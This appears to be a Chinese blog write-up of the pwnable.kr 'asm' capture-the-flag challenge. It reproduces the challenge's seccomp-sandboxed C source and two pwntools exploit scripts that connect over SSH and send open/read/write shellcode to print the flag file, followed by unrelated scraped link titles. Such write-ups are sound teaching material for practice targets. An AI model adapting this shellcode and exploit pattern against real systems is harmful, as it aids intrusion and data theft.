首先查看源代码:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>#define LENGTH 128void sandbox(){scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);if (ctx == NULL) {printf("seccomp error\n");exit(0);}seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);if (seccomp_load(ctx) < 0){seccomp_release(ctx);printf("seccomp error\n");exit(0);}seccomp_release(ctx);
}char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Welcome to shellcoding practice challenge.\n");printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");printf("If this does not challenge you. you should play 'asg' challenge :)\n");char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);memset(sh, 0x90, 0x1000);memcpy(sh, stub, strlen(stub));int offset = sizeof(stub);printf("give me your x64 shellcode: ");read(0, sh+offset, 1000);alarm(10);chroot("/home/asm_pwn");    // you are in chroot jail. so you can't use symlink in /tmp
    sandbox();((void (*)(void))sh)();return 0;
}

题目中给出了提示:

连接到本地的9026端口,asm正在执行,之后便可拿到flag,而flag所在文件为:

this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong

所以exp如下:

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
filename='this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\0'
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)#cn = process('./asm')
p.recvuntil('shellcode: ')pay = '31c031ff31d2b601be0101010181f6014640400f056a0258bf0101010181f70146404031d2b60431f60f054889c731c031d2b602be0101010181f6014940400f056a01586a015f31d2b603be0101010181f6014940400f05'.decode('hex')p.send(pay)
p.send(filename)
print p.recvuntil('\x90')

得到结果如下:

附:

exp:

from pwn import *con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)context(arch='amd64', os='linux')shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)# log.info(shellcode)#p.recvuntil('shellcode: ')
#p.send(asm(shellcode))
#log.success(p.recvline())
print shellcode
print p.recv()
p.send(asm(shellcode))
print p.recvline()

1.先调用pushstr()把文件名读进去,然后调用open打开文件
2.再用read()将文件内容读取出来
3.最后用write将内容写到屏幕
4.用asm将其转换为shellcode

转载于:https://www.cnblogs.com/liuyimin/p/7496363.html

【pwnable】asm之write up相关推荐

  1. pwnable.kr asm

    看样子是一道和shellcode有关的题目 连上去看看 目录下好像有个说明的文件查看一下 大概意思就是连接到9026端口 asm再特权下执行并get flag 那我们先看一下asm.c #includ ...

  2. Pwnable之[Toddler's Bottle](三)--asm

    Pwnable之[Toddler's Bottle](三)–ASM 提示:我觉得一个黑客应该知道怎么做shellcode 查看代码asm.c的代码 #include <stdio.h> # ...

  3. pwnable.tw startorw

    emm,之前一直想做tw的pwnable苦于没有小飞机(,今天做了一下发现都是比较硬核的pwn题目,对于我这种刚入门?的菜鸡来说可能难度刚好(orz 1.start 比较简单的一个栈溢出,给出一个li ...

  4. pwnable.kr第七八题 input leg

    第七题 input 参考链接: 这道题可太痛苦了,好多知识点: 这里只需要按它的比较走就可以了. 解题过程 第一次比较: 这里只需要让输入的长度为100,并且满足argv['A'].['B']的值即可 ...

  5. pwnable.kr---leg

    pwnable.kr-leg 解题思路 这是一道和asm有关的题,题目提供了源代码..asm文件.flag文件以及leg的可执行文件.虽然leg.c代码比较长,但是关键点只有四处,掌握好四处关键点,就 ...

  6. 【pwnable.kr】day8:leg

    pwnable:leg pwnable.kr:leg 题目链接 question Daddy told me I should study arm. But I prefer to study my ...

  7. 【pwnable.kr】leg

    pwnable从入门到放弃第八题. Download : http://pwnable.kr/bin/leg.c Download : http://pwnable.kr/bin/leg.asm ss ...

  8. pwnable.kr wp leg

    题目 Daddy told me I should study arm. But I prefer to study my leg!Download : http://pwnable.kr/bin/l ...

  9. pwnable.kr 简单题目详细笔记汇总

    文章目录 fd collision bof flag passcode random input leg mistake shellshock coin1 lotto cmd1 cmd2 uaf bl ...

最新文章

  1. linux fedora35 kvm自定义存储路径
  2. 用户 'sa' 登录失败。 (Microsoft SQL Server,错误: 18456)
  3. string数组批量转换成Int数组
  4. Redis高级实用特性:发布及订阅消息
  5. 书籍推荐:《C#7.0本质论》
  6. Zigbee如何在智能家居中成为领先的连接技术?
  7. mybatis一级,二级缓存。缓存带来的脏读问题
  8. 404 为什么是 404?
  9. 人工智能指用计算机,人工智能测试题..doc
  10. Vijos——T 1016 北京2008的挂钟 || 洛谷—— P1213 时钟
  11. Android开发之异步消息处理机制AsyncTask
  12. php 7中文手册pdf版,手册的格式 - PHP 7 中文文档
  13. SPSS安装多次显示请输入注册的电子邮箱时,采用的解决办法。亲测有效!
  14. 运用递归来画谢尔宾斯基三角形
  15. html 用户名正则表达式,独家解密实现:百度账号注册用户名正则表达式验证规则...
  16. Unity——Animation
  17. 银行会计学3(特点、核算的前提假设、对象和标准)
  18. 智能晾衣器全国产化电子元件推荐方案
  19. 游戏数据后台,kafka代替rsync同步日志数据
  20. 慎投:这两本期刊被剔除SCI/SSCI, 11月WOS数据库已更新~

热门文章

  1. python朗读网页-Python带你朗读网页
  2. 简明python教程txt-Python:将 list 写入一个 txt 文件四种方法
  3. LeetCode Self Crossing(判断是否相交)
  4. tar -P参数含义
  5. review——C# (6)虚方法和覆写方法
  6. 2.5亿个整数中找出不重复的整数
  7. C#和SqlServer中处理时间格式问题
  8. tsql2008技术内幕:tsql语言基础(第3章)
  9. q160问题,www.q160.com,ie被篡改
  10. 常用的js验证数字,电话号码,传真,邮箱,手机号码,邮编,日期